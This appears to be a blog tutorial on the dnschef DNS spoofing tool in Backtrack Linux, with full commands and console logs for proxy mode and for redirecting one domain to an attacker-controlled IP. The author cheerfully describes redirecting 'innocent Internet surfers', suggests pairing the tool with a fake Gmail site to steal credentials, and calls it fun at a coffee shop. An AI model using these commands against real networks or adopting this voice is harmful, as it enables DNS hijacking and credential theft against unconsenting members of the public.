If you want to spoof some DNS requests then dnschef is the tool to do it. I can never get enough of redirecting innocent Internet surfers to random locations. The main key for dnschef to be extremely useful is the fact that you will have to somehow get the traffic to the Backtrack Linux server running dnschef which could be done by gaining access and modifying DNS entries on a single server or by poisoning the real DNS server on a network. Below we show a couple examples of dnschef in action but overall it is really easy to use and the hard part will be figuring out the method you use to get the DNS (Domain Name Server) traffic to the Backtrack server running dnschef.
A couple notes before posting some examples before. When you are testing your dnschef example do not be surprised if the domains you specify using –fakedomains do not redirect where you specify right away as if these are domains or web sites that you visit frequently your local computer will have a cached DNS entry pointing to the correct IP until that cached entry times out. If you are on a Mac running OSX and want to clear your cache during testing then just run “sudo dscacheutil -flushcache” from a terminal window right before you begin. Also if you have a large amount of domains you want to redirect to different IP’s then use the –file switch to point to a list of domains and the IP’s you want those domains to translate too. The dnschef application is written in python and can be launched from the Backtrack command line by running /pentest/sniffers/dnschef/dnschef.py.
dnschef: Proxy DNS Traffic
- root@bt:/pentest/sniffers/dnschef# ./dnschef.py --interface=0.0.0.0 --nameservers=192.168.1.1
- _ _ __
- | | version 0.1 | | / _|
- __| |_ __ ___ ___| |__ ___| |_
- / _` | '_ \/ __|/ __| '_ \ / _ \ _|
- | (_| | | | \__ \ (__| | | | __/ |
- \__,_|_| |_|___/\___|_| |_|\___|_|
- iphelix@thesprawl.org
- [*] DNS Chef started on interface: 0.0.0.0
- [*] Using the following nameservers: 192.168.1.1
- [*] No parameters were specified. Running in full proxy mode
- [02:22:54] 192.168.1.199: proxying the response of type 'A' for p08-caldav.icloud.com
- [02:22:54] 192.168.1.199: proxying the response of type 'A' for calendar.google.com
- [02:22:59] 192.168.1.199: proxying the response of type 'A' for www.wdrb.com
- [02:22:59] 192.168.1.199: proxying the response of type 'A' for b.scorecardresearch.com
- [02:22:59] 192.168.1.199: proxying the response of type 'A' for ad.doubleclick.net
- [02:22:59] 192.168.1.199: proxying the response of type 'A' for ct1.addthis.com
- [02:22:59] 192.168.1.199: proxying the response of type 'A' for hosted.newsgator.com
- [02:22:59] 192.168.1.199: proxying the response of type 'A' for nmp.newsgator.com
- [02:22:59] 192.168.1.199: proxying the response of type 'A' for pix04.revsci.net
- [02:22:59] 192.168.1.199: proxying the response of type 'A' for wdrb.images.worldnow.com
- [02:22:59] 192.168.1.199: proxying the response of type 'A' for wnimages.images.worldnow.com
- [02:22:59] 192.168.1.199: proxying the response of type 'A' for www.google-analytics.com
- [02:22:59] 192.168.1.199: proxying the response of type 'A' for content.worldnow.com
- [02:22:59] 192.168.1.199: proxying the response of type 'A' for studio-5.financialcontent.com
- [02:22:59] 192.168.1.199: proxying the response of type 'A' for www.question-defense.com
- [02:22:59] 192.168.1.199: proxying the response of type 'A' for 1.courier-push-apple.com.akadns.net
- [02:22:59] 192.168.1.199: proxying the response of type 'A' for 1.courier-sandbox-push-apple.com.akadns.net
- [02:22:59] 192.168.1.199: proxying the response of type 'PTR' for b._dns-sd._udp.0.1.168.192.in-addr.arpa
- [02:22:59] 192.168.1.199: proxying the response of type 'PTR' for db._dns-sd._udp.0.1.168.192.in-addr.arpa
- [02:22:59] 192.168.1.199: proxying the response of type 'PTR' for r._dns-sd._udp.0.1.168.192.in-addr.arpa
- [02:22:59] 192.168.1.199: proxying the response of type 'PTR' for dr._dns-sd._udp.0.1.168.192.in-addr.arpa
In simple proxy mode dnschef will proxy all legitimate DNS requests through to Google’s public DNS server at 8.8.8.8 unless you specify DNS servers using the –nameservers command. Also it should be noted that dnschef will only listen on localhost or 127.0.0.1 unless the –interface switch is used to specify a specific interface IP address or 0.0.0.0 to listen on all interfaces. We have also set the Name Server to be the default NS server on the network using –nameservers however dnschef will still function properly if you do not set –nameservers as it defaults to Google’s public DNS server at 8.8.8.8. The above example could be useful if you wanted to analyze network traffic and where traffic on the network is going. Last but not least notice how you not only see A record traffic but you will also see any other type of DNS request such as PTR (Pointer) requests, AAAA (IPv6 A) requests, MX (Mail Exchange) records, etc. Below we show an example using more switches and specifically targeting a single domain to redirect to our own IP address. You could do this for say Gmail and have a spoofed website configured using SET (Social Engineering Toolkit) to obtain Gmail credentials.
dnschef: Spoof DNS Requests For Specific Domain
- dnschef - Backtrack - Privilege Escalation - Spoofing Attacks - Network Spoofing - dnschef
- root@bt:/pentest/sniffers/dnschef# ./dnschef.py --interface=0.0.0.0 --fakeip=192.168.1.88 --nameservers=192.168.1.1 --fakedomains=kentucky.com
- _ _ __
- | | version 0.1 | | / _|
- __| |_ __ ___ ___| |__ ___| |_
- / _` | '_ \/ __|/ __| '_ \ / _ \ _|
- | (_| | | | \__ \ (__| | | | __/ |
- \__,_|_| |_|___/\___|_| |_|\___|_|
- iphelix@thesprawl.org
- [*] DNS Chef started on interface: 0.0.0.0
- [*] Using the following nameservers: 192.168.33.1
- [*] Cooking replies to point to 192.168.33.88 matching: kentucky.com
- [01:58:22] 192.168.1.199: proxying the response of type 'A' for 1.courier-sandbox-push-apple.com.akadns.net
- [01:58:23] 192.168.1.199: cooking the response of type 'A' for kentucky.com to 192.168.1.88
- [01:58:32] 192.168.1.199: proxying the response of type 'A' for VM2K3SP1.example.com
- [01:58:32] 192.168.1.199: proxying the response of type 'AAAA' for VM2K3SP1.example.com
- [01:58:53] 192.168.1.199: cooking the response of type 'A' for kentucky.com to 192.168.1.88
- [01:58:56] 192.168.1.199: proxying the response of type 'A' for mail.google.com
- [01:59:07] 192.168.1.199: proxying the response of type 'A' for 1.courier-push-apple.com.akadns.net
- ^C[*] DNSChef is shutting down.
- root@bt:/pentest/sniffers/dnschef#
Again notice how we also set the DNS server to 192.168.1.1 for requests that we are not spoofing which is the internal DNS server on the network. This is done so everything seems normal to the end user as they may have specific DNS entries for local or external resources on the internal DNS server. In the above example we are only spoofing the DNS for a single domain which we would then setup a web server on 192.168.1.88 to either gain credentials or attempt to gain access to the remote client computer, etc. That pretty much covers the dnschef capabilities except for the –tcp switch which will use TCP DNS proxy instead of UDP DNS proxy and the -q switch to quiet down the output by not displaying all of the headers. I really like this tool as it is one of those types of tools you can have a lot of fun with at the coffee shop!
